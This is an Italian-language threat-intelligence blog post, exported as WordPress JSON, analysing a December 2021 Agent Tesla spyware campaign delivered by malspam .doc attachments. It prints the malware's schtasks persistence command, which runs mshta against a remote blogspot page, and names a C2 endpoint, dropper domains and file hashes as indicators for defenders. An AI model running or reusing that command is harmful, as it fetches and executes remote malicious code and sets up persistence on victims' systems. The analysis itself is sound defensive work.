{"id":4174,"date":"2021-12-06T15:02:14","date_gmt":"2021-12-06T15:02:14","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=4174"},"modified":"2023-09-16T10:59:53","modified_gmt":"2023-09-16T10:59:53","slug":"agent-tesla-campagna-malware-del-6-dicembre-2021","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/agent-tesla-campagna-malware-del-6-dicembre-2021\/","title":{"rendered":"Agent Tesla: campagna Malware del 6 Dicembre 2021"},"content":{"rendered":"\n

Agent Tesla <\/strong>\u00e8 uno Spyware <\/strong>che, registrando le sequenze di tasti premuti e le azioni dell’utente, esfiltra informazioni dai sistemi vittima.
Questo Spyware \u00e8 stato creato utilizzando il framework .Net<\/strong> e trasmette i dati personali al server di comando e controllo (C2). Agent Tesla \u00e8 in grado di accedere alle informazioni salvate nei browser Web<\/strong>, nei client di posta elettronica <\/strong>e nei client FTP<\/strong>.
Il malware \u00e8 dotato di meccanismi di evasion <\/em>dell’antivirus<\/strong> e di persistenza <\/em>sul sistema per ripartire anche a fronte del riavvio del sistema compromesso. <\/p>\n\n\n\n

Negli ultimi giorni \u00e8 stata rilevata una nuova campagna di malspam<\/strong>. La mail invita l’utente a scaricare ed aprire l’allegato.<\/p>\n\n\n

\n
\"\"<\/figure>\n<\/div>\n\n\n

L’allegato della mail \u00e8 un file in formato doc che attraverso mshta.exe<\/strong> contatta il dominio https:\/\/bitly[.]com\/asdqwdwdsfvcxvccv<\/strong> il quale risponde con il seguente file html:<\/p>\n\n\n\n

<html>\n<head><title>Bitly<\/title><\/head>\n<body><a href=\"https:\/\/sqlserviceazure.blogspot[.]com\/p\/bathindasboba[.]html\">moved here<\/a><\/body>\n<\/html><\/code><\/pre>\n\n\n\n
Dopo una serie di passaggi viene creato un task schedulato<\/strong> attraverso il comando:<\/p>\n\n\n\n
\"C:\\Windows\\System32\\schtasks.exe\" \/create \/sc MINUTE \/mo 80 \/tn \"\"Bluefibonashi\"\" \/F \/tr \"\"\"\"\\\"\"\"\"MsHtA\"\"\"\"\\\"\"\"\"http:\/\/1230948%1230948@sqlserverserviceagent.blogspot.com\/p\/justtheback.html\\\"\"\"\"<\/code><\/pre>\n\n\n\n
Contemporaneamente viene scaricato ed eseguito tramite PowerShell il sample di Agent Tesla<\/strong>. Il quale inizier\u00e0 a comunicare con il server di comando e controllo attraverso delle POST <\/strong>a http:\/\/microsoftazyresql.duckdns.org\/j\/p29oa\/mawa\/eae7bc3b675ad7042607.php<\/strong><\/p>\n\n\n\n
Agent Tesla \u00e8 un keylogger<\/strong> e data-stealer<\/strong>, capace di rubare le credenziali contenute all’interno dei principali Browser, oltre ai dati di configurazione e le credenziali di VPN, FTP e client di posta.<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
IOC<\/strong><\/p>\n\n\n\n
File DOC:<\/p>\n\n\n\n
    \n
  • Nome <\/strong>invoice#6317236-booking.com,pdf.doc<\/li>\n\n\n\n
  • MD5 <\/strong>d74f268b986fecfa03b81029dd134811<\/li>\n\n\n\n
  • SHA1 <\/strong>d49848ac2888e080883a427ef18b406fdcab6b9b<\/li>\n\n\n\n
  • SHA256 <\/strong>81fcb3dce45b041a91b0c0e01c27e032d7e8d26217d4b6d669ce258b491a830d<\/li>\n<\/ul>\n\n\n\n
    Domini:<\/p>\n\n\n\n
      \n
    • C2 <\/strong>\n
        \n
      • microsoftazyresql.duckdns[.]org <\/li>\n\n\n\n
      • 103.147.185[.]68<\/li>\n<\/ul>\n<\/li>\n\n\n\n
      • Dropper <\/strong>\n
          \n
        • bitly[.]com<\/li>\n\n\n\n
        • 67.199.248[.]14<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
          <\/p>\n","protected":false},"excerpt":{"rendered":"
          Agent Tesla \u00e8 uno Spyware che, registrando le sequenze di tasti premuti e le azioni dell’utente, esfiltra informazioni dai sistemi vittima.Questo Spyware \u00e8 stato creato utilizzando il framework .Net e trasmette i dati personali al server di comando e controllo (C2). Agent Tesla \u00e8 in grado di accedere alle informazioni salvate nei browser Web, nei […]<\/p>\n","protected":false},"author":7,"featured_media":4176,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[1553,1555,1515,1439,1557],"class_list":["post-4174","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it","tag-agent-tesla-it","tag-exfiltration-it","tag-malspam-it","tag-malware-it","tag-spyware-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4174","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=4174"}],"version-history":[{"count":7,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4174\/revisions"}],"predecessor-version":[{"id":5205,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4174\/revisions\/5205"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/4176"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=4174"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=4174"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=4174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}